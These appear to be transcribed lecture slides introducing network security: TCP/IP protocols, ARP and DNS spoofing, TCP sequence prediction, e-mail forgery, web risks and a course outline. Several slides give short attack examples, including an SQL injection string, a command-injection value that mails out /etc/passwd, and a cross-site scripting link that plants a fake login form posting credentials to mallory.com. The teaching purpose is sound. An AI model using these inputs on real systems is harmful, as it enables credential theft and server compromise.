Introduction. © Levente Buttyán 2 Outline TCP/IP networking overview protocols and known vulnerabilities – ARP / ARP spoofing – IP / eavesdropping,
Post on 18-Dec-2015
227 Views
Preview:
Transcript
2© Levente Buttyán
Outline
TCP/IP networking overview protocols and known vulnerabilities
– ARP / ARP spoofing– IP / eavesdropping, alteration, traffic analysis, etc.– TCP / SYN attack– Telnet, FTP / password sniffing – SMTP / e-mail forgery, eavesdropping, alteration– DNS / DNS spoofing
more known security problems– Web forms, cookies, and CGI scripts– mobile code (Java scripts, Java applets, and ActiveX controls)– denial of service (DoS)– exploiting bugs in software (buffer overflow problems)
outline of the course
3© Levente Buttyán
DNS
HTTP
FTP
TCP/IP layering
TCPTCP UDPUDP
IPIPICMPICMP IGMPIGMP
ARPARP RARPRARPhardwareinterface
hardwareinterface
SMTP
…
…
application
SNMP
media
transport
network
link
TCP/
IP n
etw
orki
ng o
verv
iew
4© Levente Buttyán
An example
HTTPclient
HTTPclient
TCPTCP
IPIP
Ethernetdriver
Ethernetdriver
HTTPserver
HTTPserver
TCPTCP
IPIP
token ringdriver
token ringdriver
IPIP
Ethernetdriver
Ethernetdriver
token ringdriver
token ringdriver
Ethernettoken ring
HTTP
TCP
IP IP
Ethernetprotocol
tokenring
protocol
router
end system end system
TCP/
IP n
etw
orki
ng o
verv
iew
5© Levente Buttyán
Encapsulation
user data
HTTP hdr
HTTPclient
HTTPclient
TCPTCP
IPIP
Ethernetdriver
Ethernetdriver
Ethernet
TCP hdr
IP hdr
Eth. hdr tr.
TCP/
IP n
etw
orki
ng o
verv
iew
6© Levente Buttyán
RARPRARP
IGMPIGMP
Demultiplexing
Ethernetdriver
Ethernetdriver
DNSHTTP
FTP
TCPTCP UDPUDP
IPIP
ICMPICMP
ARPARP
SMTPSNMP
……
demuxing based on frame typein the Ethernet header
demuxing based on the protocol id in the IP header
demuxing based on the port numberin the TCP or UDP header
TCP/
IP n
etw
orki
ng o
verv
iew
7© Levente Buttyán
Names and addresses
IP addresses– every interface has a unique IP address– 32 bits long, usually given in dotted decimal notation– 5 classes:
• class A: “0” + 7 bits net ID + 24 bits host ID • class B: “10” + 14 bits net ID + 16 bits host ID• class C: “110” + 21 bits net ID + 8 bits host ID• class D: “1110” + 28 bits multicast group ID• class E: starts with “11110”, reserved for future use
– subnet addressing (CIDR - classless Internet domain routing)• host ID portion is divided into a subnet ID and a host ID• e.g., class B address: “10” + 14 bit net ID + 8 bit subnet ID + 8 bit host IDhierarchical addressing
TCP/
IP n
etw
orki
ng o
verv
iew
8© Levente Buttyán
Names and addresses
hardware address (MAC addresses)– every interface has a unique and fixed hardware address too– it is used by the data link layer– in case of Ethernet, it is 48 bits long– mapping between IP addresses and MAC addresses are done by ARP
host names– human readable, hierarchical names, such as www.hit.bme.hu– every host may have several names– mapping between names and IP addresses is done by the Domain
Name System (DNS)
TCP/
IP n
etw
orki
ng o
verv
iew
9© Levente Buttyán
ARP – Address Resolution Protocol
mapping from IP addresses to MAC addresses
Request
140.252.13
.1 .2 .3 .4 .508:00:20:03:F6:42 00:00:C0:C2:9B:26
Reply
140.252.13
.1 .2 .3 .4 .508:00:20:03:F6:42 00:00:C0:C2:9B:26
arp req | target IP: 140.252.13.5 | target eth: ?
arp rep | sender IP: 140.252.13.5 | sender eth: 00:00:C0:C2:9B:26
Prot
ocol
s an
d vu
lner
abili
ties
10© Levente Buttyán
ARP spoofing
an ARP request can be responded by another host
Request
140.252.13
.1 .2 .3 .4 .508:00:20:03:F6:42 00:00:C0:C2:9B:26
Reply
140.252.13
.1 .2 .3 .4 .508:00:20:03:F6:42 00:00:C0:C2:9B:26
arp req | target IP: 140.252.13.5 | target eth: ?
arp rep | sender IP: 140.252.13.5 | sender eth: 00:34:CD:C2:9F:A0
00:34:CD:C2:9F:A0
Prot
ocol
s an
d vu
lner
abili
ties
11© Levente Buttyán
IP – Internet Protocol
provides an unreliable, connectionless datagram delivery service to the upper layers
its main function is routing it is implemented in both end systems and intermediate
systems (routers) routers maintain routing tables that define the next hop router
towards a given destination (host or network) IP routing uses the routing table and the information in the IP
header (e.g., the destination IP address) to route a packet
Prot
ocol
s an
d vu
lner
abili
ties
12© Levente Buttyán
IP security problems
user data in IP packets is not protected in any way– anyone who has access to a router can read and modify the user data in the
packets IP packets are not authenticated
– it is fairly easy to generate an IP packet with an arbitrary source IP address traffic analysis
– even if user data was encrypted, one could easily determine who is communicating with whom by just observing the addressing information in the IP headers
information exchanged between routers to maintain their routing tables is not authenticated
– correct routing table updates can be modified or fake ones can be disseminated– this may screw up routing completely leading to loops or partitions– it may also facilitate eavesdropping, modification, and monitoring of traffic– it may cause congestion of links or routers (i.e., denial of service)
Prot
ocol
s an
d vu
lner
abili
ties
13© Levente Buttyán
TCP – Transmission Control Protocol
provides a connection oriented, reliable, byte stream service to the upper layers
connection oriented:– connection establishment phase prior to data transfer– state information (sequence numbers, window size, etc.) is maintained
at both ends
reliable:– positive acknowledgement scheme (unacknowledged bytes are
retransmitted after a timeout)– checksum on both header and data– reordering of segments that are out of order– detection of duplicate segments– flow control (sliding window mechanism)
Prot
ocol
s an
d vu
lner
abili
ties
14© Levente Buttyán
TCP connection establishment
– sequence numbers are 32 bits long– the sequence number in a data segment identifies the first byte in the
segment– sequence numbers are initialized with a “random” value during
connection setup– the RFC suggests that the ISN is incremented by one at least every 4 s
3 way handshake
SYN = ISNC
SYN = ISNS, ACK(ISNC)
ACK(ISNS)
data transfer
client server
ISN – Initial Sequence Number
Prot
ocol
s an
d vu
lner
abili
ties
15© Levente Buttyán
TCP SYN attack
in Berkeley implementations, the ISN is incremented by a constant amount (64000)
– once per 0.5 second, and– each time a connection is initiated
it is not hopeless to guess the next ISN to be used by a server an attacker can impersonate a trusted host (e.g., in case of r commands,
authentication is based on source IP address solely)
SYN = ISNX, SRC_IP = T
SYN = ISNS, ACK(ISNX)
ACK(ISNS), SRC_IP = T
SRC_IP = T, nasty_data
attacker server trusted host (T)
Prot
ocol
s an
d vu
lner
abili
ties
16© Levente Buttyán
TCP SYN attack – How to guess ISNS?
– ISNS’ depends on ISNS and t– t can be estimated from the round trip time– assume t can be estimated with 10 ms precision– the attacker has an uncertainty of 1280 in the possible value for ISNS’– assume each trial takes 5 s– the attacker has a reasonable likelihood of succeeding in 6400 s and a
near-certainty within one day
SYN = ISNX
SYN = ISNS, ACK(ISNX)
SYN = ISNX’, SRC_IP = T SYN = ISN
S’, ACK(ISNX)ACK(ISN
S’), SRC_IP =T
attacker server
t
Prot
ocol
s an
d vu
lner
abili
ties
17© Levente Buttyán
FTP – File Transfer Protocol
user
userinterface
userinterface
protocolinterpreter
protocolinterpreter
datatransferfunction
datatransferfunction
file system
protocolinterpreter
protocolinterpreter
datatransferfunction
datatransferfunction
file system
client
server
data connection
control connection(FTP commands and replies)
Prot
ocol
s an
d vu
lner
abili
ties
18© Levente Buttyán
FTP cont’d
typical FTP commands:– RETR filename – retrieve (get) a file from the server– STOR filename – store (put) a file on the server– TYPE type – specify file type (e.g., A for ASCII)– USER username – username on server– PASS password – password on server
FTP is a text (ASCII) based protocol
% ftp ftp.epfl.ch
Connected to ftp.epfl.ch.Name: buttyan
Password: kiskacsa
client server
<TCP connection setup to port 21 of ftp.epfl.ch>
“220 ftp.epfl.ch FTP server (version 5.60) ready.”
“USER buttyan”
“331 Password required for user buttyan.”
“PASS kiskacsa”
“230 User buttyan logged in.”
…
Prot
ocol
s an
d vu
lner
abili
ties
19© Levente Buttyán
Telnet
provides remote login service to users works between hosts that use different operating systems uses option negotiation between client and server to determine
what features are supported by both ends
Telnet clientTelnet clientTelnet serverTelnet server
terminaldriver
terminaldriver TCP/IPTCP/IP pseudo-
terminaldriver
pseudo-terminaldriver
TCP/IPTCP/IP
login shelllogin shell
user
kernel kernel
TCP connection
Prot
ocol
s an
d vu
lner
abili
ties
20© Levente Buttyán
Telnet cont’d
Telnet session example (“character at a time” mode)
% telnet ahost.epfl.ch
Connected to ahost.epfl.ch.Escape character is ‘^]’.
Login: b
client server
<TCP connection setup to port 23 of ahost.epfl.ch>
<Telnet option negotiation>
“UNIX(r) System V Release 4.0”
“Login:”
“b”
“Password:”
…
Login: bu“u”
Login: buttyan“n”
Password: k“k”
…Password: kiskacsa
“a”
<OS greetings and shell prompt, e.g., “%”>…Pr
otoc
ols
and
vuln
erab
ilitie
s
21© Levente Buttyán
SMTP – Simple Mail Transfer Protocol
useragent
useragent
localMTA
localMTA
mails to be sent
user
sending host
relayMTA
relayMTA
useragent
useragent
localMTA
localMTA
user mailbox
user
receiving host
relayMTA
relayMTA
relayMTA
relayMTA
TCP port 25
TCP connection SMTP
SMTP
SMTP
SMTP
Prot
ocol
s an
d vu
lner
abili
ties
22© Levente Buttyán
SMTP cont’d
SMTP is used by MTAs to talk to each other SMTP is a text (ASCII) based protocol
sending MTA (rivest.hit.bme.hu) receiving MTA (shamir.hit.bme.hu)
“HELO rivest.hit.bme.hu.”
“250 shamir.hit.bme.hu Hello rivest.hit.bme.hu., pleased to meet you”
“MAIL from: buttyan@rivest.hit.bme.hu”
“250 buttyan@rivest.hit.bme.hu... Sender ok”
“RCPT to: hubaux@lca.epfl.ch”
“250 hubaux@lca.epfl.ch… Recipient ok”
“DATA”
“354 Enter mail, end with a “.” on a line by itself”
<message to be sent>.
<TCP connection establishment to port 25>
“250 Mail accepted”
“QUIT”
“221 shamir.hit.bme.hu delivering mail”
Prot
ocol
s an
d vu
lner
abili
ties
23© Levente Buttyán
SMTP security problems
SMTP does not provide any protection of e-mail messages– messages can be read and modified by any of the MTAs involved– fake messages can easily be generated (e-mail forgery)
Example:
% telnet frogstar.hit.bme.hu 25Trying...Connected to frogstar.hit.bme.hu.Escape character is ‘^[’.220 frogstar.hit.bme.hu ESMTP Sendmail 8.11.6/8.11.6; Mon, 10 Feb 2003 14:23:21 +0100helo abcd.bme.hu250 frogstar.hit.bme.hu Hello [152.66.249.32], pleased to meet youmail from: bill.gates@microsoft.com250 2.1.0 bill.gates@microsoft.com... Sender okrcpt to: buttyan@ebizlab.hit.bme.hu250 2.1.5 buttyan@ebizlab.hit.bme.hu... Recipient okdata354 Enter mail, end with "." on a line by itselfYour fake message goes here..250 2.0.0 h1ADO5e21330 Message accepted for deliveryquit221 frogstar.hit.bme.hu closing connectionConnection closed by foreign host.%
Prot
ocol
s an
d vu
lner
abili
ties
24© Levente Buttyán
Be careful, though!
Return-Path: <bill.gates@microsoft.com>Received: from frogstar.hit.bme.hu (root@frogstar.hit.bme.hu [152.66.248.44])
by shamir.ebizlab.hit.bme.hu (8.12.7/8.12.7/Debian-2) with ESMTP id h1ADSsxG022719for <buttyan@ebizlab.hit.bme.hu>; Mon, 10 Feb 2003 14:28:54 +0100
Received: from abcd.bme.hu ([152.66.249.32])by frogstar.hit.bme.hu (8.11.6/8.11.6) with SMTP id h1ADO5e21330for buttyan@ebizlab.hit.bme.hu; Mon, 10 Feb 2003 14:25:41 +0100
Date: Mon, 10 Feb 2003 14:25:41 +0100From: bill.gates@microsoft.comMessage-Id: <200302101325.h1ADO5e21330@frogstar.hit.bme.hu>To: undisclosed-recipients:;X-Virus-Scanned: by amavis-dcStatus:
Your fake message goes here.
Prot
ocol
s an
d vu
lner
abili
ties
25© Levente Buttyán
DNS – Domain Name System
The DNS is a distributed database that provides mapping between hostnames and IP addresses
the DNS name space is hierarchical– top level domains: com, edu, gov, int, mil, net, org, ae, …, hu, … zw– top level domains may contain second level domains
e.g., bme within hu, epfl within ch, …– second level domains may contain third level domains, etc.
each domain has name servers– usually (not always) a name server knows the IP address of the top level
name servers– if a domain contains sub-domains, then the name server knows the IP
address of the sub-domain name servers– when a new host is added to a domain, the administrator adds the
(hostname, IP address) mapping to the database of the local name serverPr
otoc
ols
and
vuln
erab
ilitie
s
26© Levente Buttyán
DNS cont’d
– a single DNS reply may include several (hostname, IP address) mappings (Resource Records)
– received information is cached by the name server
Prot
ocol
s an
d vu
lner
abili
ties
applicationapplication localname srv
localname srv
top levelname srv
top levelname srv
name srvin hu
name srvin hu
name srvin bme.hu
name srvin bme.hu
name srvin hit.bme.hu
name srvin hit.bme.hu
frogstar.hit.bme.hu = ? frogstar.hit.bme.hu = ?
IP of ns in hufrogstar.hit.bme.hu = ?IP of ns in bme.hu
IP of ns in hit.bme.hu
152.66.248.44
152.66.248.44
27© Levente Buttyán
DNS spoofing
the cache of a DNS name server is poisoned with false information
how to do it?– assume that the attacker wants www.anything.hu to map to his own IP
address 152.66.249.32– approach 1:
• attacker submits a DNS query “www.anything.hu=?” to ns.victim.hu• a bit later it forges a DNS reply “www.anything.hu=152.66.249.32”• UDP makes forging easier but the attacker must still predict the query ID
– approach 2 (attacker has access to ns.attacker.hu):• the attacker modifies its local name server such that it responds a query
“www.attacker.hu=?” with “www.anything.hu=152.66.249.32”• the attacker then submits a query “www.attacker.hu=?” to ns.victim.hu • ns.victim.hu sends the query “www.attacker.hu=?” to ns.attacker.hu• ns.attacker.hu responds with “www.anything.hu=152.66.249.32”
Prot
ocol
s an
d vu
lner
abili
ties
28© Levente Buttyán
Web security – Browser side risks
obtaining a valid browser– IE usually comes with the OS– Netscape can be obtained from web sites– How can you be sure that you are downloading a genuine copy?
(remember DNS spoofing)– a fake browser can look like a genuine one, but it can
• obtain and send passwords typed in by the user• downgrade browser security (e.g., reduce key length used in SSL)• …
web forms– used to send data from the user to the server (e.g., online applications,
queries to a database, etc.)– if pure HTTP is used, then the data is sent in clear– sensitive information can be eavesdropped and/or modified
Web
sec
urity
pro
blem
s
29© Levente Buttyán
Browser side risks cont’d
helper applications– the browser cannot handle all kind of downloaded data– it invokes an external program (the helper) on the user’s machine with
the downloaded data as parameter– e.g., to display a PostScript file, it may pass it to GhostView– downloaded content can be dangerous (e.g., MS Word and Excel files
may contain macro viruses)
mobile code– Java applets
• normally run within a controlled environment (sandbox)• access to local resources is strictly controlled by a security manager • however, an applet may escape from the sandbox due to some bugs in the
implementation of the Java Virtual Machine• several such bugs have been discovered, reported, and fixed• what guarantees that there’s no more?
Web
sec
urity
pro
blem
s
30© Levente Buttyán
Browser side risks cont’d
mobile code (cont’d)– ActiveX controls
• a Microsoft approach to mobile code• ActiveX controls are executables that run directly on the machine (there’s
no sandbox)• ActiveX controls can be signed and declared safe by their creators• but an ActiveX control declared safe may turn out to be dangerous
– Compaq signed a control safe which allowed for remote management of servers
– Microsoft signed a control which could write arbitrary file on the hard disk (it was exploited by a virus Kak.Worm)
– JavaScript != Java applet• scripts are interpreted by the browser itself• not as powerful as Java (e.g., many attacks require that the user clicks on a
button to activate the malicious code)• successful attacks reported include history tracking, stealing files, helping
Java applets to bypass firewalls, etc.
Web
sec
urity
pro
blem
s
31© Levente Buttyán
Browser side risks cont’d
cookies– a cookie is a (name, value) pair– cookies are set by web servers and stored by web browsers– a cookie set by a server is sent back to the server when the browser
visits the server again– used to create “HTTP sessions” (session state information is stored in
cookies)– example:
get index.html
content of index.html + set-cookie: sessionID=123456789
get nextlink.html + cookie: sessionID=123456789
…
client server
Web
sec
urity
pro
blem
s
32© Levente Buttyán
Browser side risks cont’d
cookies (cont’d)– if cookies are sent in clear, then they can be eavesdropped and used to hijack
an “HTTP session”– cookies can be used to track what sites the user visits (can lead to serious
privacy violation!)• many sites use third party advertisements• the third party can set a cookie that identifies the user• this cookie is sent to the third party each time an ad is downloaded by the user’s
browser along with the address of the page that contains the link to the ad (the “referrer” field of the HTTP header contains this address)
browserbrowser
thirdparty.comthirdparty.com
<html>…<img src=“http://thirdparty.com/ad_server.asp”>…</html>
index.html
whatever.com
get ad_server.asp + referrer=“whatever.com/index.html” + cookie: user=123456789
Web
sec
urity
pro
blem
s
33© Levente Buttyán
Browser side risks cont’d
http://www.musicvision.com/network_privacy_policy.html
Third Party AdvertisingWe use Maxworldwide and other third-party advertising companies to serve ads when you visit our Web site. These companies may use information (not including your name, address, email address or telephone number) about your visits to this and other Web sites in order to provide advertisements on this site and other sites about goods and services that may be of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, please click here
Third Party CookiesIn the course of serving advertisements to this site, our third-party advertiser may place or recognize a unique "cookie" on your browser.
Web
sec
urity
pro
blem
s
34© Levente Buttyán
Web security – Server side risks
interactive web sites are based on forms and scripts– forms are written in html– the user fills the form and clicks on a button to submit it– this creates a request to the server that contains the data typed in by
the user– the request launches a script on the server that processes the data
supplied by the user (may return a page that is created using the supplied data)
unexpected user input may have unexpected effects– special characters– too much data (may cause buffer overflow)
at best, the server crashes at worst, the attacker gains control over the server
Web
sec
urity
pro
blem
s
35© Levente Buttyán
Server side risks cont’d
an example: password based user authentication– assume the following server side script is used to check the supplied
username and password:query$ = ‘SELECT name, pass FROM database WHERE name = “ ’ + name$ + ‘ ” AND
pass = “ ’ + pass$ + ‘ ” ’
Result = SQLquery(query$)
if Result <> 0 then OK
– with name$ = buttyan and pass$ = kiskacsaSELECT name, pass FROM database WHERE name = “buttyan” AND pass = “kiskacsa”
– with name$ = buttyan” OR TRUE OR name = “ and pass$ = kiskacsaSELECT name, pass FROM database WHERE name = “buttyan” OR TRUE OR name = “”
AND pass = “kiskacsa”
Web
sec
urity
pro
blem
s
36© Levente Buttyán
Server side risks cont’d
another example: the user can type her e-mail address in a form and the server sends her the latest public company report– assume the following perl script is used on the server
system(“sendmail $address < report.doc”);
– with $address = buttyan@hit.bme.husystem(“sendmail buttyan@hit.bme.hu < report.doc”);
– with $address = buttyan@hit.bme.hu < /etc/passwd | sendmail buttyan@hit.bme.hu
system(“sendmail buttyan@hit.bme.hu < /etc/passwd | sendmail
buttyan@hit.bme.hu < report.doc”);
Web
sec
urity
pro
blem
s
37© Levente Buttyán
Server side risks cont’d
Buffer overflow attacks– if the program doesn’t verify that the supplied data fits in the allocated
space, then it may overwrite some parts of the memory, which may contain data, instructions, or addresses
– by carefully analyzing the program structure one can provide machine code as part of the supplied data that will be executed by the server
– many attacks use buffer overflow bugs (e.g., infamous Internet Worm by Morris used a buffer overflow bug in the sendmail program)
Format string attack– printf(“%s”, str); -- correct.– printf(str); -- will compile, but dangerous!
• str will be interpreted as a format string
Web
sec
urity
pro
blem
s
38© Levente Buttyán
Cross site scripting
the attacker arranges that the victim receives a malicious script from a trusted server
example:– Mallory places the script in the “guest book” of Bob– Alice visits the “guest book” of Bob– her browser downloads and runs Mallory’s script
Web
sec
urity
pro
blem
s
39© Levente Buttyán
CSS cont’d
another example– when requesting a non-existent file abcd.html from some web servers,
they return error messages like:“The requested file abcd.html cannot be found on the server.”
– Mallory can place the following link on a page:< a href=“http://trusted.server.com/is protected. The server needs you to
login.<br><form action="http://mallory.com/cgiscript.cgi" method="post">Username: <input type="text" name="name"><br>Password: <input type="password" name="pass"><br><input type="submit" value="Login"></form><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”>
– what will happen?• Alice clicks on the link• HTTP request is sent to trusted.server.com• the server returns the usual error page, but it will look like a login window...
Web
sec
urity
pro
blem
s
40© Levente Buttyán
CSS cont’d
The requested file is protected. The server needs you to log in.
Username:
Password:
LoginLogin
cannot be found on the server.
browser window
Web
sec
urity
pro
blem
s
41© Levente Buttyán
Conclusion
there are many more vulnerabilities and attacks
some of these cannot be prevented by technical means, but only with careful procedures and education of people
this course will focus on technical countermeasures
Intruders
High
Low1980 1985 1990 1995 2000
IntruderKnowledge
AttackSophistication
Cross site scripting
password guessing
self-replicating code
password cracking
exploiting known vulnerabilities
disabling auditsback doors
hijacking sessions
sweepers
sniffers
packet spoofing
GUI
automated probes/scans
denial of service
www attacks
Tools“stealth” / advanced scanning techniques
burglaries
network mgmt. diagnostics
distributedattack tools
Staged
Auto Coordinated
© 2002 by Carnegie Mellon Universityhttp://www.cert.org/archive/ppt/cyberterror.ppt
42© Levente Buttyán
Course outline
brief introduction to cryptography e-mail security: PGP, S/MIME secure remote access: SSH the Secure Socket Layer (SSL) network layer security: IPSec (AH, ESP, IKE) link layer security: L2TP e-commerce security: SET, e-cash, micropayments privacy protection: Onion routing, Crowds Java security DNS security firewalls and intrusion detection systems Wi-Fi security (IEEE 802.11 wireless LAN) peer-to-peer security
top related